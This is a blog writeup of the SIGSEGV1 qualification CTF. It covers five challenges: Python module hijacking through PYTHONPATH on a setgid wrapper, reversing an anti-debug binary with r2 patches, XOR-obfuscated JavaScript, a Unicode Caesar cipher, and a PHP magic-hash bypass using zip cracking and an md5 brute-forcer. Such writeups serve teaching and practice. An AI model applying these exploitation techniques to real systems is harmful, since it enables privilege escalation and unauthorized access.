SIGSEGV1 qualification CTF

A series of security challenges

October 12, 2018

After my r2con r2wars writeup, here's another writeup of a "challenge". This challenge is the Capture-The-Flag (CTF) pre-qualifications for the SIGSEGV1 conference in Paris. It felt a bit weird to have a conference registration limited to those who pass a certain challenge, but I was curious about what it would be like, so I thought: why not ?

Fun avec python

The first challenge was around python, one had to connect to a server, and try to capture the "flag", a file which you don't have access to, by exploiting a vulnerability in code on the server. This is what it looks like:

chall@ae805fd9fe99:~$ ls -l
total 16
-r--r----- 1 root chall-pwned   42 Oct  5 17:00 flag
-rwxr-xr-x 1 root root         307 Sep 20 00:21 hello-world.py
-rwxr-sr-x 1 root chall-pwned 6304 Oct  5 17:05 wrapper

The flag file is the goal, but we can't read it with our permission level (chall user. ). The wrapper is a suid binary that just calls the hello-world.py script. This is the content of the script:

#!/usr/bin/python2.7

from colors import colors

def main():
    print('This is an advanced hello-world')
    print('The world is more joyful with colors')
    print('So, here we are:')
    print('{}Hello-World !{}'.format(colors.bcolors.OKBLUE, colors.bcolors.ENDC))

if __name__ == '__main__':
    main()

One of the issue, is that when calling suid-binaries, you control the environment, and if it isn't cleared, you can control how the executables behave. Here, we are attacking the python script (it's the name of the challenge). The goal will be to use the import clause of the script to run our one code.

I reproduced the environment locally to do some tests, here is my test.py script:

#!/usr/bin/env python2
import colors

print("coucou")

And here is the colors.py I used:

#!/usr/bin/env python
print open("flag", "r").readline()

Running test.py on my machine shows that it's executing code in colors.py before doing anything, so it works. Now, I need to upload colors.py on the server, somewhere I can write files. Home isn't writable, so I just used /tmp. I put colors.py in /tmp/colors/. Then, I used the PYTHONPATH variable to run the script with the search path for modules modified:

chall@ae805fd9fe99:~$ PYTHONPATH=/tmp ./wrapper
sigsegv{518012356c8a2ed93b8d3e2416bb2274}

Traceback (most recent call last):
  File "/home/chall/hello-world.py", line 3, in <module>
    from colors import colors
ImportError: cannot import name colors

The rest of the script fails, but, we can clearly see the flag: sigsegv{518012356c8a2ed93b8d3e2416bb2274}

antistrings

This is a simple reverse engineering challenge, but with a few traps. I fell into all of them. The binary is backed up here if you want to see for yourself.

Despite the title being, "antistrings", I still went ahead and looked at the strings:

$ r2 linux_x64_chall_v1.bin
 -- This is just an existentialist experiment.
[0x00400650]> iz
[Strings]
Num Vaddr      Paddr      Len Size Section  Type  String
000 0x00000b48 0x00400b48 147 148 (.rodata) ascii Strings won't help you that much.\n\n[+] Activating obfuscation layer 1...\n[+] Act]
001 0x00000bdc 0x00400bdc  12  13 (.rodata) ascii KIS\bJED@\rL]_
002 0x00000bed 0x00400bed   4   5 (.rodata) ascii \nBB^
003 0x00000bf2 0x00400bf2   8   9 (.rodata) ascii _YMCJ@];
004 0x00000c00 0x00400c00  15  16 (.rodata) ascii fIIO[K_YAO[Y^\@
005 0x00000c15 0x00400c15   4   5 (.rodata) ascii RZJX
006 0x00000c1a 0x00400c1a  13  14 (.rodata) ascii K($b%($!grdcA
007 0x00000c28 0x00400c28   9  10 (.rodata) ascii lHDG[XNOY
008 0x00000c32 0x00400c32   5   6 (.rodata) ascii F^AGG
009 0x00000c3d 0x00400c3d   5   6 (.rodata) ascii [\]TP
010 0x00000c48 0x00400c48  11  12 (.rodata) ascii ~\rz\b~OGOBCJ
011 0x00000c5b 0x00400c5b   4   5 (.rodata) ascii jm|v
012 0x00000c60 0x00400c60  10  11 (.rodata) ascii ^V^,-'-# L
013 0x00000c6b 0x00400c6b  10  11 (.rodata) ascii ~\rz\byFNM^K
014 0x00000c76 0x00400c76   5   6 (.rodata) ascii U_FVF
015 0x00000c80 0x00400c80   4   5 (.rodata) ascii \W]Z

So, the strings are encrypted. No big deal, I'll find later how.

[0x00400650]> aaa
...snip...8<...
[0x00400650]> s main
[0x00400aa2]> pdf
┌ (fcn) main 19
│   main (int argc, char **argv, char **envp);
│           ; DATA XREF from entry0 (0x40066d)
│           0x00400aa2      4883ec08       sub rsp, 8
│           0x00400aa6      b800000000     mov eax, 0
│           0x00400aab      e830ffffff     call fcn.004009e0
│           0x00400ab0      4883c408       add rsp, 8
└           0x00400ab4      c3             ret

A short main() (I skipped the libc entry point here), going to directly to another function.

[0x00400aa2]> s fcn.004009e0
[0x004009e0]> pdf 10
┌ (fcn) fcn.004009e0 16
│   fcn.004009e0 ();
│       ⁝   ; CALL XREF from main (0x400aab)
│       ⁝   0x004009e0      4883ec28       sub rsp, 0x28               ; '('
│       ⁝   0x004009e4      50             push rax
│       ⁝   0x004009e5      31c0           xor eax, eax
│       ⁝   0x004009e7      85c0           test eax, eax
│       ⁝   0x004009e9      58             pop rax
│      ┌──< 0x004009ea      7502           jne 0x4009ee
│     ┌───< 0x004009ec      7401           je 0x4009ef
│     │││   ; CODE XREF from fcn.004009e0 (0x4009ea)
└     │└└─< 0x004009ee      ebb9           jmp 0x4009a9                ; sub.BB_7c2+0x1e7

Here we can see the first trick: a jump to an unaligned address, after testing a very simple (always true) condition.

[0x004009e0]> s 0x4009ef
[0x004009ef]> pd 10
│           ; CODE XREF from fcn.004009e0 (0x4009ec)
│           0x004009ef      b900000000     mov ecx, 0
            0x004009f4      ba01000000     mov edx, 1
            0x004009f9      be00000000     mov esi, 0
            0x004009fe      bf00000000     mov edi, 0
            0x00400a03      b800000000     mov eax, 0
            0x00400a08      e823fcffff     call sym.imp.ptrace
            0x00400a0d      4885c0         test rax, rax
        ┌─< 0x00400a10      791e           jns 0x400a30

And here we have the first anti-debug: ptrace(PTRACE_TRACEME, 0, 0, 0) is called. The manpage says this is to Indicate that this process is to be traced by its parent.. In other words, this is used to detect if the process is currently being ptraced, which is the basic building block of all debuggers on Linux. On success, the program will print "not cool bro", and then exit.

My first idea, was to modify the binary (it doesn't seem to have any integrity verification built-in). We want to simulate ptrace() returning an error; we'll just put -1 into eax, the return register in this x86 call convention. This is done with:

[0x004009ef]> s 0x00400a08
[0x00400a08]> "wa sub eax, 1;nop;nop"

Don't forget to open the binary with r2 in write mode (-w command line switch). Afterwards, the code looks like this:

            0x004009ef      b900000000     mov ecx, 0
            0x004009f4      ba01000000     mov edx, 1
            0x004009f9      be00000000     mov esi, 0
            0x004009fe      bf00000000     mov edi, 0
            0x00400a03      b800000000     mov eax, 0
            0x00400a08      83e801         sub eax, 1
            0x00400a0b      90             nop
            0x00400a0c      90             nop
            0x00400a0d      4885c0         test rax, rax
        ┌─< 0x00400a10      791e           jns 0x400a30

No more ptrace()! This might be useful if I want to run the binary in a VM with gdb or strace. Let's continue on the execution path.

[0x004009ef]> s 0x400a30
[0x00400a30]> pd 10
            ;-- rip:
            ; CODE XREF from fcn.004009e0 (+0x30)
            0x00400a30      bf480c4000     mov edi, str.z___OGOBCJ     ; 0x400c48 ; "~\rz\b~OGOBCJ\x10E]\x13@]S\x17jm|v\x1c^V^,-'-# L"
            0x00400a35      e80cfdffff     call sub.strlen_746
            0x00400a3a      4889c7         mov rdi, rax
            0x00400a3d      b800000000     mov eax, 0
            0x00400a42      e879fbffff     call sym.imp.printf         ; int printf(const char *format)

The first obfuscated string appears here. It is then passed to a function (that calls strlen()) that will transform it (decrypt?) before printing it. Let's see what this function looks like.

[0x00400a30]> pdf @sub.strlen_746
┌ (fcn) sub.strlen_746 124
│   sub.strlen_746 (char *arg1);
│           ; var char *s @ rsp+0x8
│           ; var void *local_10h @ rsp+0x10
│           ; var size_t size @ rsp+0x18
│           ; var int local_1ch @ rsp+0x1c
│           ; arg char *arg1 @ rdi
│           ; CALL XREFS from sub.BB_7c2 (0x4009a6, 0x4009c4)
│           ; CALL XREF from fcn.004009e0 (+0x3c)
│           ; CALL XREFS from rip (+0x5, +0x1c)
│           0x00400746      4883ec28       sub rsp, 0x28               ; '('
│           0x0040074a      48897c2408     mov qword [s], rdi          ; arg1
│           0x0040074f      488b442408     mov rax, qword [s]          ; [0x8:8]=-1 ; 8
│           0x00400754      4889c7         mov rdi, rax                ; const char *s
│           0x00400757      e854feffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│           0x0040075c      89442418       mov dword [size], eax
│           0x00400760      8b442418       mov eax, dword [size]       ; [0x18:4]=-1 ; 24
│           0x00400764      4898           cdqe
│           0x00400766      4889c7         mov rdi, rax                ; size_t size
│           0x00400769      e8a2feffff     call sym.imp.malloc         ; void *malloc(size_t size)
│           0x0040076e      4889442410     mov qword [local_10h], rax
│           0x00400773      c744241c0000.  mov dword [local_1ch], 0
│       ┌─< 0x0040077b      eb31           jmp 0x4007ae
│       │   ; CODE XREF from sub.strlen_746 (0x4007b6)
│      ┌──> 0x0040077d      8b44241c       mov eax, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝│   0x00400781      4863d0         movsxd rdx, eax
│      ⁝│   0x00400784      488b442410     mov rax, qword [local_10h]  ; [0x10:8]=-1 ; 16
│      ⁝│   0x00400789      4801d0         add rax, rdx                ; '('
│      ⁝│   0x0040078c      8b54241c       mov edx, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝│   0x00400790      4863ca         movsxd rcx, edx
│      ⁝│   0x00400793      488b542408     mov rdx, qword [s]          ; [0x8:8]=-1 ; 8
│      ⁝│   0x00400798      4801ca         add rdx, rcx                ; '&'
│      ⁝│   0x0040079b      0fb612         movzx edx, byte [rdx]
│      ⁝│   0x0040079e      8b4c241c       mov ecx, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝│   0x004007a2      83c125         add ecx, 0x25               ; '%'
│      ⁝│   0x004007a5      31ca           xor edx, ecx
│      ⁝│   0x004007a7      8810           mov byte [rax], dl
│      ⁝│   0x004007a9      8344241c01     add dword [local_1ch], 1
│      ⁝│   ; CODE XREF from sub.strlen_746 (0x40077b)
│      ⁝└─> 0x004007ae      8b44241c       mov eax, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝    0x004007b2      3b442418       cmp eax, dword [size]       ; [0x18:4]=-1 ; 24
│      └──< 0x004007b6      7cc5           jl 0x40077d
│           0x004007b8      488b442410     mov rax, qword [local_10h]  ; [0x10:8]=-1 ; 16
│           0x004007bd      4883c428       add rsp, 0x28               ; '('
└           0x004007c1      c3             ret

Wow, that's a lot of code. Let's take some time to process this. The first part saves the size of the argument in local variable size, then allocates a second buffer of the same size.

The second part will loop over both buffers, and put in the decoded buffer, each character, like this:

decoded[i] = a[i] ^ 0x25

It then returns the decoded string. I wrote a small python program to reproduce this:

#!/usr/bin/env python3
import sys
a = sys.stdin.read()
print("".join([chr(ord(a[i]) ^ (i+0x25)) for i in range(len(a)) ]) )

We can then use this from r2 to decode a random string:

[0x00400a30]> pr 48 @ str.fIIO_K_YAO_Y | ./decode.py

Congratulations! You have the flag :-)

Hum, this looks interesting. Let's rename the r2 string flag to remember this, it will be useful later to locate where this is printed:

[0x00400a30]> fr str.fIIO_K_YAO_Y "str.Congratulations! You have the flag :-)"

Let's continue where we left off: we wanted to decode, then print a string. Let's see what it was:

[0x00400a30]> pr 48 @ str.z___OGOBCJ |./decode.py

[+] Welcome to the RTFM challenge

Nice ! This is the programs's opening prompt. Let's continue with the next printed string:

[0x00400a42]> pr 48 @ str.z__yFNM_K |./decode.py

[+] Please enter the flag: @ACXG~
GHIBKLMV����ST

Once this is shown, we have the read() on stdin that asks for the flag:

            0x00400a6d      4889e0         mov rax, rsp
            0x00400a70      ba14000000     mov edx, 0x14               ; 20
            0x00400a75      4889c6         mov rsi, rax
            0x00400a78      bf00000000     mov edi, 0
            0x00400a7d      e85efbffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)

And then another unaligned jump trick to fool the reader, but reversed (eax != 0):

            0x00400a82      50             push rax
            0x00400a83      31c0           xor eax, eax
            0x00400a85      85c0           test eax, eax
            0x00400a87      58             pop rax
        ┌─< 0x00400a88      7502           jne 0x400a8c
       ┌──< 0x00400a8a      7401           je 0x400a8d
       ││   ; CODE XREF from rip (+0x58)
      ┌─└─> 0x00400a8c      eb48           jmp 0x400ad6

Followed by a function call:

[0x00400a42]> pd 10 @ 0x400a8c
            ; CODE XREF from rip (+0x58)
        ┌─< 0x00400a8c      eb48           jmp 0x400ad6
        │   0x00400a8e      89e0           mov eax, esp
        │   0x00400a90      4889c7         mov rdi, rax
        │   0x00400a93      e82afdffff     call sub.BB_7c2

In this function we'll see something curious:

[0x00400650]> s sub.BB_7c2
[0x004007c2]> pd 30
┌ (fcn) sub.BB_7c2 396
│   sub.BB_7c2 (int arg1);
│           ; var int local_8h @ rsp+0x8
│           ; var void *buf @ rsp+0x10
│           ; var unsigned int fildes @ rsp+0x28
│           ; var signed int local_2ch @ rsp+0x2c
│           ; arg int arg1 @ rdi
│           ; CALL XREF from fcn.004009e0 (+0xb3)
│           0x004007c2      4883ec38       sub rsp, 0x38               ; '8'
│           0x004007c6      48897c2408     mov qword [local_8h], rdi   ; arg1
│           0x004007cb      c744242c20a1.  mov dword [local_2ch], 0x7a120 ; [0x7a120:4]=-1
│       ┌─< 0x004007d3      eb47           jmp 0x40081c
│       │   ; CODE XREF from sub.BB_7c2 (0x400821)
│      ┌──> 0x004007d5      836c242c01     sub dword [local_2ch], 1
│      ⁝│   0x004007da      be00000000     mov esi, 0                  ; int oflag
│      ⁝│   0x004007df      bfed0b4000     mov edi, str.BB             ; 0x400bed ; "\nBB^\x06_YMCJ@];" ; const char *path
│      ⁝│   0x004007e4      b800000000     mov eax, 0
│      ⁝│   0x004007e9      e852feffff     call sym.imp.open           ; int open(const char *path, int oflag)
│      ⁝│   0x004007ee      89442428       mov dword [fildes], eax
│      ⁝│   0x004007f2      837c242800     cmp dword [fildes], 0
│     ┌───< 0x004007f7      7918           jns 0x400811
│     │⁝│   0x004007f9      488d4c2410     lea rcx, [buf]              ; 0x10 ; 16
│     │⁝│   0x004007fe      8b442428       mov eax, dword [fildes]     ; [0x28:4]=-1 ; '(' ; 40
│     │⁝│   0x00400802      ba0a000000     mov edx, 0xa                ; size_t nbyte
│     │⁝│   0x00400807      4889ce         mov rsi, rcx                ; void *buf
│     │⁝│   0x0040080a      89c7           mov edi, eax                ; int fildes
│     │⁝│   0x0040080c      e8cffdffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
│     │⁝│   ; CODE XREF from sub.BB_7c2 (0x4007f7)
│     └───> 0x00400811      8b442428       mov eax, dword [fildes]     ; [0x28:4]=-1 ; '(' ; 40
│      ⁝│   0x00400815      89c7           mov edi, eax                ; int fildes
│      ⁝│   0x00400817      e8b4fdffff     call sym.imp.close          ; int close(int fildes)
│      ⁝│   ; CODE XREF from sub.BB_7c2 (0x4007d3)
│      ⁝└─> 0x0040081c      837c242c00     cmp dword [local_2ch], 0
│      └──< 0x00400821      7fb2           jg 0x4007d5

open() is called on a file, which once decoded the name is /dev/urandom. But the filename is never decoded. Is this a bug ? Or a last minute modification ? Then, 10 bytes are read() from this file. The file is closed. And this is done again. 0x7a120 times ! This is another anti-debug, probably designed to slow down strace. I tried running the binary (in a disposable VM!); strace is indeed very slow. Running the binary directly takes less than 5 seconds to pass this code. I'm guessing that it was probably decided that actually opening and reading the blocks in /dev/urandom would be too slow, or less portable. Or it's just a bug :smile:

Since I had already disabled an anti-debug, I disable this one as well:

[0x004007c2]> s 0x004007cb
[0x004007cb]> "wa  mov dword [rsp+0x2c], 0"

By setting the loop counter to 0 instead of 0x7a120, this anti-debug code is never run.

After this, there's another unaligned jump trick, and then the value that was read() previously is finally analyzed:

[0x0040082e]> pd 20 @ 0x40082e
│           ; CODE XREF from sub.BB_7c2 (0x40082b)
│           0x0040082e      488b442408     mov rax, qword [local_8h]   ; [0x8:8]=-1 ; 8
            0x00400833      0fb600         movzx eax, byte [rax]
            0x00400836      3c73           cmp al, 0x73                ; 's' ; 115
        ┌─< 0x00400838      0f8581010000   jne 0x4009bf                ; sub.BB_7c2+0x1fd
        │   0x0040083e      488b442408     mov rax, qword [rsp + 8]    ; [0x8:8]=-1 ; 8
        │   0x00400843      4883c001       add rax, 1
        │   0x00400847      0fb600         movzx eax, byte [rax]
        │   0x0040084a      3c69           cmp al, 0x69                ; 'i' ; 105
       ┌──< 0x0040084c      0f856d010000   jne 0x4009bf                ; sub.BB_7c2+0x1fd
       ││   0x00400852      488b442408     mov rax, qword [rsp + 8]    ; [0x8:8]=-1 ; 8
       ││   0x00400857      4883c002       add rax, 2
       ││   0x0040085b      0fb600         movzx eax, byte [rax]
       ││   0x0040085e      3c67           cmp al, 0x67                ; 'g' ; 103
      ┌───< 0x00400860      0f8559010000   jne 0x4009bf                ; sub.BB_7c2+0x1fd

It looks like a character-by-character comparison of the buffer read, starting with 's', then 'i', then 'g'. Is this the flag ? We know (it's in the rules) that the flags are in the format sigsegv{FLAG}, so this looks like it ! Two "unaligned jumps" later, we can gather all the characters for the flag. This is left as an exercise for the reader.

This was a quite tedious debug. In fact, I could have ignored most of this, and jumped directly to the interesting part: the analysis of the read() result. Instead, I spent a lot of time disabling anti-debugs, analyzing the decryption function, and I even played a bit with ESIL emulation (not shown here). It was fun, but it could have been solved much more quickly. The top challenger did it ~4 minutes, while it took me a few hours, but I learned a lot along the way !

Javascript obfusqué

This challenge starts quite simply. You can find the backed-up source here. Just opening the developer console in the browser allows you to quickly see the whole unpacked code (formatted a bit here):

function Kod(s, pass) {
    var i=0;
    var BlaBla="";
    for(j=0; j<s.length; j++) {
        BlaBla+=String.fromCharCode((pass.charCodeAt(i++))^(s.charCodeAt(j)));
        if (i>=pass.length) i=0; 
    }
    return(BlaBla);
}
function f(form){
    var pass=document.form.pass.value;
    var hash=0;
    for(j=0; j<pass.length; j++){
        var n= pass.charCodeAt(j);
        hash += ((n-j+33)^31025); 
    }
    if (hash == 529387) {
        var Secret =""+"\x4f\x01\x13\x1e\x09\x59\x34\x09\x0b\x05\x26\x53\x31\x41\x5a\x18\x0e\x53\x1d\x15\x1c\x10\x11\x13\x5b\x06\x16\x69\x15\x29\x55\x1d\x55\x5d\x06\x1d\x0e\x1f\x0c\x14\x13\x5b\x06\x16\x69\x1e\x2a\x40\x5a\x1d\x18\x53\x19\x06\x00\x16\x02\x56\x0a\x1f\x16\x69\x07\x30\x14\x1b\x0a\x5d\x07\x1b\x08\x06\x13\x02\x56\x0b\x05\x06\x3b\x53\x33\x55\x16\x10\x19\x16\x1b\x47\x1f\x00\x47\x15\x13\x0b\x1f\x25\x16\x2b\x53\x1f\x45\x52\x1b\x1d\x0a\x1f\x5b"+"";
        var s=Kod(Secret, pass);
        document.write (s); 
    } else {
        alert ('Wrong password!'); 
    } 
}

The function f() is called on form submit. It first computes a custom checksum of the password, and if it matches, it tries to use to decrypt a secret with Kod(). This custom checksum contains a core XOR, that is run on very character, before adding to the total sum. We know that there's a good chance that each character's charCode will be < 127 (in the ASCII space), so we can actually use the checksum to deduce the size of the password (the upper bits being more significant):

529387/31025 = 17.06323932312651

It's 17 characters !

The decode function is Kod(); it is run as a fixed-key XOR with the password as key, and the Secret variable as message. This should be crypto 101 (well, almost), and if not, you can follow the cryptopals challenges to learn how to do that. Since I wasn't so certain that I could do it on my own in a short-enough time, I just reused someone else's solution with the key size I already found. It didn't give a perfect decrypt, but it was close enough to help me find the flag.

In retrospect, I could have also used the fact that the start of the flags is always the same ('sigsegv{'), and then decode it by hand, but this was good enough.

In the JS console of your browser, you can see how to decrypt the secret:

Kod(Secret, flag)
"<html>Bravo tu as trouve le flag, utilise le mot de passe que tu as trouve pour valider le challenge</html>"

Un nouveau dialecte

This challenge, was in the "Crypto" section. Wait, didn't we have crypto in the two last challenges as well ?

The goal was to decode this new "dialect":

ȃǹǷȃǵǷȆȋǜǑǣǤǕǗǑǓǕǣǤǠǑǣǣǙǖǑǓǙǜǕȍ

As I do in most challenges, I put the content in a file (named "file", I also lack imagination), loaded it in ipython3, and started visualizing and massaging the data

Python 3.6.6 (default, Jul 19 2018, 14:25:17) 
Type 'copyright', 'credits' or 'license' for more information
IPython 6.4.0 -- An enhanced Interactive Python. Type '?' for help.

In [1]: a=open("file", "rb").read()
In [2]: print(a)
b'\xc8\x83\xc7\xb9\xc7\xb7\xc8\x83\xc7\xb5\xc7\xb7\xc8\x86\xc8\x8b\xc7\x9c\xc7\x91\xc7\xa3\xc7\xa4\xc7\x95\xc7\x97\xc7\x91\xc7\x93\xc7\x95\xc7\xa3\xc7\xa4\xc7\xa0\xc7\x91\xc7\xa3\xc7\xa3\xc7\x99\xc7\x96\xc7\x91\xc7\x93\xc7\x99\xc7\x9c\xc7\x95\xc8\x8d'

In [3]: print(str(a, encoding="utf-8"))
ȃǹǷȃǵǷȆȋǜǑǣǤǕǗǑǓǕǣǤǠǑǣǣǙǖǑǓǙǜǕȍ
In [4]: b = [ a[i:i+2] for i in range(0, len(a), 2) ]
In [5]: b
Out[5]:
[b'\xc8\x83',
 b'\xc7\xb9',
 b'\xc7\xb7',
 b'\xc8\x83',
 b'\xc7\xb5',
 b'\xc7\xb7',
 b'\xc8\x86',
 b'\xc8\x8b',
 b'\xc7\x9c',
 b'\xc7\x91',
 b'\xc7\xa3',
 b'\xc7\xa4',
 b'\xc7\x95',
 b'\xc7\x97',
 b'\xc7\x91',
 b'\xc7\x93',
 b'\xc7\x95',
 b'\xc7\xa3',
 b'\xc7\xa4',
 b'\xc7\xa0',
 b'\xc7\x91',
 b'\xc7\xa3',
 b'\xc7\xa3',
 b'\xc7\x99',
 b'\xc7\x96',
 b'\xc7\x91',
 b'\xc7\x93',
 b'\xc7\x99',
 b'\xc7\x9c',
 b'\xc7\x95',
 b'\xc8\x8d']

I first analyzed the UTF-8 encoded codepoints (as binary data), but was soon lucky, and found that the Unicode codepoints (not their UTF-8 encoded version) were in fact all in the same range, hinting to a simple Caesar cipher. Here is the final visualizing and decoding program:

#!/usr/bin/env python3
# coding: utf-8

s=open("file", "r").read()

for i in s:
    print("{} {:04x}: {:16b}".format(i, ord(i), ord(i)), end='\t')
    x = ord(i) - 0x100 - 144
    print("{:09b} {} {}".format(x, x, chr(x)))

print("".join([chr(ord(i) - 400) for i in s]))

Note that this was very easy because I'm used to launch python3 by default, which is unicode-native; ord() behaves as it should. Anyone used to python2, would be in a bit more pain, since the characters would have been interpreted byte-by-byte.

La simplicité

Under the "simplicity" title, this one might be the longest to solve. To start, you're given a "simple" website, that looks like this:

$ curl  http://51.158.73.218:8880/
<html>
    <head>
        <title>Un site simple</title></title>
    </head>
    <body>
        <center><iframe width="560" height="315" src="https://www.youtube.com/embed/2bjk26RwjyU?rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></center>
<!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->
<!-- Un formulaire c'était pas assez simple donc on en a pas mis -->
</body>
</html>

I did quite a lot of exploration on this: I tried different http methods (to no avail), I discovered that the name of the file was "index.php". I tried a few standard "admin" pages. Then I moved on to the other challenges, keeping this one last.

When I came back to it, I had an epiphany. The solution to unlock the first step was simple, in retrospect (as announced):

$ curl  http://51.158.73.218:8880/robots.txt
backup.zip

Oh. So I download this zip file, (backup here), and it's a password-protected zip containing an index.php:

$ unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password:

No solution here, one has to use bruteforce to crack this zip. I download john the ripper, and extract the crackable hash:

$ ./JohnTheRipper/run/zip2john  backup.zip  > john.hash
ver 2.0 efh 5455 efh 7875 backup.zip->index.php PKZIP Encr: 2b chk, TS_chk, cmplen=453, decmplen=680, crc=70C7CB88
$ cat john.hash
backup.zip:$pkzip2$1*2*2*0*1c5*2a8*70c7cb88*0*43*8*1c5*70c7*bce4*01f43e1d0eb0118661d22e480e38736de7c321d3ac1cf086601594c4ab54ebc7af0ad5ea01c8b64bda21aee19533a09808c0e7892fdb08f8df9644eeefc9aabe92b3c1cb10fb981090365d55229da292afba120f388d25a56e52c91b42af567d2ee897c5bd979b673a99fe187e4064f438165815d29fad2d1a7edbdf46ee2ff99afb546e1626cbb57897b6a108a3fb108495ec508243bffe3d050efe1b9aadf700695f8aca72e4e1977f827702ec5840fbe1559e0ac1e646323ea051ee69257030c3b33d305d9ab6f70dc600a2d4cc07482df8d95e4dd8741082540e3b2ec988eab2c99a595927eb31cc589d8bd28068ddd375588c668f52f5896d45e42de0d1933dc390a5c2a5ee3b8d30b91b763bb77892651dd9241bf03dde65ad8b6acee2bcb3942dc800aa3350d2f894c32fc0dcba5164d9db59dd09044d28b44181a19398d27c64b65bd1c8e4cdce21eeac513172d340ca4b54baf5570921dc182e3b02b0ff8d0b0ac4070a0715f6300f8fb99ffdc665270cc98fae8d28f3727742b79e2bd9392f35e4564a243234e9cf502beb0e3572c2c83a33b68c56cc317aece233f99a02838c9c562ebb3271d58aa6bb653b43803c9188b1c737cfa827c533ff301e453fb111*$/pkzip2$:::::backup.zip

Then I run john on it:

$ ./JohnTheRipper/run/john --show john.hash 
backup.zip:passw0rd:::::backup.zip

1 password hash cracked, 0 left

This runs almost instantly; so the password is "passw0rd". We can unzip the file, and get the source code of index.php. This is the same page as before, with the more interesting parts shown here:

<?php
include "auth.php";
?>
[…]
<?php
        if(isset($_POST["h1"]))
        {
                $h1 = md5($_POST["h1"] . "Shrewk");
                echo "h1 vaut: ".$h1."</br>";
                if($h1 == "0")
                {
                                echo "<!--Bien joué le flag est ".$flag."-->";
                }
        }
?>
[…]

So, there's a POST parameter h1, which is hashed with a "Shrewk" salt, and then compared to the string "0". Wait, what ? How can md5() return "0" ?

The php documentation doesn't mention anything of the sort. But you can quickly find that the comparison operation "==" isn't recommended to compare strings, because of type juggling. Indeed, a string like "1e3", will be resolved to the integer 1000, for example. A secure string comparison should use "===".

So, this might be the core of the challenge. Maybe what we need is an md5 hash string that starts with many "0", then "e" or "E", and then is followed by only digits ? It looks like we need to crack some md5 as well.

I installed hashcat, and started looking at the documentation. I found a lot of ways to parametrize the input to be hashed, but no way to filter the hashes in output to look like a given format. I attempted to generate a lot of hashes in hope of finding a random password that would match one of them, with the given program:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>



int main() {
        uint64_t i;
        unsigned int seed;
        for (i = 0; i < (1<< 29); i++)
                printf("0e%010d%010d%010d:Shrewk\n", rand_r(&seed), rand_r(&seed), rand_r(&seed));
}

This writes data in the hashcat format hash:salt. I used it to generate a lot of potential hashes, but hashcat needs to load all of them into memory, and whether you have 1GB or 1TB of RAM, this is still is many order of magnitudes smaller than the space I want to explore. So while hashcat was running, I started working on a more exhaustive exploration.

I decided to use a go program, because this is an embarrassingly parallel problem, and will be much easier to crack with go routines. First, here is the match function, to test if a hex-encoded hash has the format we want:

func match(x string) bool {
        i := 0
        for x[i] == '0' {
                i++
        }
        if i < 1 {
                return false
        }
        if x[i] != 'e' && x[i] != 'E' {
                return false
        }
        for i++; i < len(x) && (x[i] >= '0' && x[i] <= '9'); i++ {
        }
        return i == len(x)
}

And its corresponding test:

func TestMatch(t *testing.T) {
        samples := []struct {
                v   string
                ret bool
        }{
                {"000e1234123456781234567812345678", true},
                {"0a0e1234123456781234567812345678", false},
                {"00E01234123456781234567812345678", true},
                {"00EE1234123456781234567812345678", false},
                {"00E01234123456781234567812345ab8", false},
                {"0e000000000000000000000000000000", true},
        }
        for i := range samples {
                if match(samples[i].v) != samples[i].ret {
                        t.Fatal("Error: ", samples[i].v, samples[i].ret)
                }
        }
}

This is the only function that was tested because of how core it was to finding a solution. Note that it might have been faster to work directly on byte data instead of converting the md5 to a hex-encoded string, but I found it an acceptable compromise to keep the code readable and correct.

The rest of the code is just an exhaustive exploration of password space (with the salt), with a recursive core.

func core2(share, max int) {
        const alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwyxz.;/-{}"
        const salt = "Shrewk"
        for size := share; ; size += max {
                if size == 0 {
                        continue
                }
                b := make([]byte, size+len(salt))

                for c := 0; c < size; c++ {
                        b[c] = alphabet[0]
                }
                for c := 0; c < len(salt); c++ {
                        b[c+len(b)-len(salt)] = salt[c]
                }
                var charloop func(int, func())
                charloop = func(i int, f func()) {
                        for c := 0; c < len(alphabet); c++ {
                                b[i] = alphabet[c]
                                if i > 0 {
                                        charloop(i-1, f)
                                } else {
                                        f()
                                }
                        }
                }
                //recursion is much easier
                charloop(size-1, func() {
                        h := md5.Sum(b)
                        he := hex.EncodeToString(h[:])
                        if match(he) {
                                fmt.Println("Found match: ", string(b), he)
                                os.Exit(0)
                                return
                        }
                })
        }
}

Particular attention was given on minimizing the allocations, to reduce the performance impact. This is why the core function works on a single []byte slice. The hex.EncodeToString does many allocations though.

The main function does the work sharing, in a naive way: the size of the password is used to slice the work between goroutines:

func main() {
        c := make(chan struct{})
        for i := 0; i < runtime.NumCPU(); i++ {
                go func() {
                        core2(i, runtime.NumCPU())
                        c <- struct{}{}
                        os.Exit(0)
                }()
        }
        <-c
}

This means, that the program will be non-deterministic, depending on the number of cores we have, and the particular scheduling of goroutines.

This code finds a password on my 2012 laptop in about 3 minutes.

$ time ./crack 
Found match:  KgeM5000Shrewk 0e957579856924481004771378652894

real    2m45.885s
user    10m28.607s
sys     0m2.147s

And let's test this password we found:

$ curl -s -d h1=KgeM5000  http://51.158.73.218:8880/index.php |grep flag
h1 vaut: 0e957579856924481004771378652894</br><!--Bien joué le flag est sigsegv{a1a29afa647a20758e64b49d8eb453f4}--><!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->

Unsurprisingly, it was much faster on a modern 8 core Xeon; and it found another password first because of the work sharing structure :

$ curl -s -d h1=QM8.B0  http://51.158.73.218:8880/index.php |grep flag
h1 vaut: 0e893977776066512259427456189998</br><!--Bien joué le flag est sigsegv{a1a29afa647a20758e64b49d8eb453f4}--><!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->

And that's it for the challenges !